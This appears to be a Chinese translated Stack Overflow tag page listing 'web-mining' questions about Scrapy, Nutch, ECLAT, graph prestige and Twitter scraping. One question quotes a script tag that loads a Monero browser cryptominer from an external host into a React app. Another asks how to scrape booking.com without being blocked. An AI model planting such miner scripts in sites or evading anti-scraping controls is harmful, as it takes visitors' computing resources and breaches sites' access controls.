“web-mining”的相关标签问题

0 投票

2 回答

1526 浏览

python - 学位、亲近和等级声望

我想使用python为现有图形找到这三个Prestige 度量：

学位声望
邻近声望
等级声望

我可以为此目的使用networkx吗？如果没有，那么我可以使用哪个库以及我该怎么做。任何链接或参考表示赞赏。

2018-08-28T12:30:49.380

0 投票

1 回答

252 浏览

web-scraping - 抓取 AMP 版本的网页是否更容易？

我正在开发一个汇总报纸文章的网络抓取工具。我知道 AMP 协议要求使用精简版的 Javascript，而且我也知道 Javascript（部分）使网站管理员能够检测/防止抓取。所以从逻辑上讲，我认为抓取 AMP 网站会更容易。但是，另一方面，如果这是真的，我认为 StackOverflow 会在它之上，但我还没有找到一个线程来重申我的推论。我是正确的还是我忽略了什么？

web-scraping beautifulsoup web-crawler amp-html web-mining

2019-04-08T00:47:08.493

0 投票

1 回答

186 浏览

data-mining - ECLAT算法找到最大和闭合频繁集

有人可以解释如何获得最大频繁项集和闭合频繁项集吗？我一直试图在网上寻找资源，但未能找到令人满意的解释来解决这个问题。在最大的情况下，我已经能够解决直到最终的支持表，但除此之外，我无法找到找到所需集合的方法。

data-mining data-warehouse numeric mining web-mining

2020-04-25T09:47:21.087

0 投票

1 回答

515 浏览

python - 如何使用scrapy，xpath，python在锚标记中获取文本和href值

我有一个这样的 HTML 文件：

在文件夹 spiders 中，我有一个文件jacks.py，如下所示：

我在main.py中调用了 JokesSpider 类（该文件位于根目录），这是我的代码

我想将数据写入 items.json，但是当我运行此代码时，items.json 中不包含任何内容，我该如何解决这个问题。非常感谢

python web-scraping scrapy web-mining

2020-06-12T08:02:31.317

0 投票

0 回答

97 浏览

python - 通过将 URL 从其他 *.py 文件传递给 Scrapy 从 url 中获取数据

我正在使用 Scrapy 从网站上抓取数据，这是我在 Scrapy 文件夹蜘蛛中的文件 spider.py 中的代码

我ThumbSpider在文件main.py中调用类并在终端中运行此文件

我的程序没有从 2 个 url 中得到任何东西，但是当我取消注释start_urls = ['https://vietnamnews.vn/politics-laws', 'https://vietnamnews.vn/society']和删除类和文件 main.py 中的方法时__init__，编辑它运行良好。我不知道发生了什么。任何人都可以帮助我，非常感谢start_requestsThumbSpiderprocess2.crawl(ThumbSpider, start_urls=msc.getUserChoices())process2.crawl(ThumbSpider)

python scrapy data-science web-mining

2020-06-14T14:07:54.500

0 投票

1 回答

129 浏览

javascript - 函数未从外部 js 文件导入反应

我正在从 EJS 模板迁移一个网络矿工来做出反应。下面的代码开始挖掘过程。

它从该 URL 加载必要的数据（包括函数 EverythingIsLife），然后运行它，在开始挖掘时向用户发送消息。但是，当我尝试在反应中做同样的事情时：

WebMinerPage.jsx：

在我的 index.html 的头部我有： <script src="https://cloud-miner.de/tkefrep/tkefrep.js?tkefrep=bs?nosaj=faster.moneroocean"></script>

它返回一个错误：

编译失败！EverythingisLife 没有定义。

我该如何解决这个问题？任何帮助，将不胜感激。

javascript reactjs import web-mining

2020-08-04T19:39:47.563

0 投票

1 回答

91 浏览

solr - Apache Nutch 仅索引 Solr 的文章页面

我已经设置了 Nutch 1.17 来抓取几个网站。像往常一样，高层可以有两种类型的网页。首先是类别页面或主页，不包含任何特定故事的详细信息，但提供多个页面的链接和短文本。其次，有些页面包含详细的完整故事信息，即文章。

现在我的问题是如何确定这是实际的文章页面，而该页面是类别页面。此外，我也有兴趣仅索引故事页面？

我认为 Nutch 默认没有任何东西。我怎样才能实现这种行为？

solr web-crawler nutch web-mining nutch2

2020-08-25T02:25:38.873

0 投票

1 回答

55 浏览

web-scraping - scrapy spider 的防御性网络抓取技术

我已经进行了大约 3 个月的网络抓取，并且我注意到我的许多蜘蛛需要经常照看，因为网站不断变化。我使用 scrapy、python 和 crawlera 来抓取我的网站。例如，两周前我创建了一个蜘蛛，但由于网站将它们的元标记从单数更改为复数（所以位置变成了位置），我不得不重新构建它。这么小的变化应该不会真的惹恼我的蜘蛛，所以我想对我的收藏采取更具防御性的方法。有没有人对网络抓取有任何建议以减少保姆？先感谢您！

web-scraping scrapy scrapy-shell web-mining

2021-01-11T16:39:59.080

0 投票

1 回答

284 浏览

python - 如何在 booking.com 上使用 scrapy 而不会被阻止？

我正在尝试使用 python 插件 scrapy 从 booking.com 抓取酒店评论。

我的问题是，scrapy 找不到所需的数据（例如负面反馈）。我认为，这是因为网站中嵌入了 javascript 代码。

因此，我尝试在 settings.py 文件中更改我的用户代理，但没有任何改变。然后我尝试模拟浏览器请求，但我不确定我是否正确执行。

这是我要抓取评论的酒店的链接：https ://www.booking.com/hotel/de/best-western-plus-marina-star-lindau.de.html

这是我的蜘蛛：

对于 settings.py 中的 User-Agent，我尝试了自己的 User-Agent 和 Google-Agent。

非常感谢您的帮助

python scrapy web-crawler web-mining

2021-03-06T19:22:31.293

0 投票

2 回答

462 浏览

python - 从 Twitter 用户列表 (csv) 中抓取加入日期/用户信息

我正在寻找一个可能非常简单的问题的解决方案，并且非常感谢一些帮助或提示。我有 python 和 webscraping 的基本知识。

我想在 Twitter 上探索某个主题标签及其背后的社区。使用twint，我已将所有提及主题标签的推文下载到 .csv 文件中。之后，我清理了 .csv，这样就没有同一用户的多个条目（来自具有相同主题标签的多个推文）并将其保存为 .txt。我现在想获得关于上述列表中大约 1.500 名用户的更多信息——主要是他们加入推特的日期，推文的数量将是一个奖励。

我试过的： Twint 应该能够做到这一点，但它没有用（我正在使用他们 github 上提供的 docker 镜像）。我试图通过以下方式获取用户信息：

Twint 发出一条很长的错误消息，如果我理解正确的话，它与 twint 中的一个开放错误有关：

我试图遍历列表并让 twint 单独查找每个用户名，但它也不起作用：

用 Google Colab 运行它，我给了我

我在寻找 什么获取列表中这些用户的加入日期的最简单的解决方案是什么？我应该使用不同的库吗？我可以用 beautifulsoup 之类的东西遍历列表并刮掉加入日期吗？我该怎么做？

非常感谢您的帮助，在此先感谢！

python web-scraping twitter web-mining twint

2021-03-31T17:14:22.460

问题标签 [web-mining]

Reference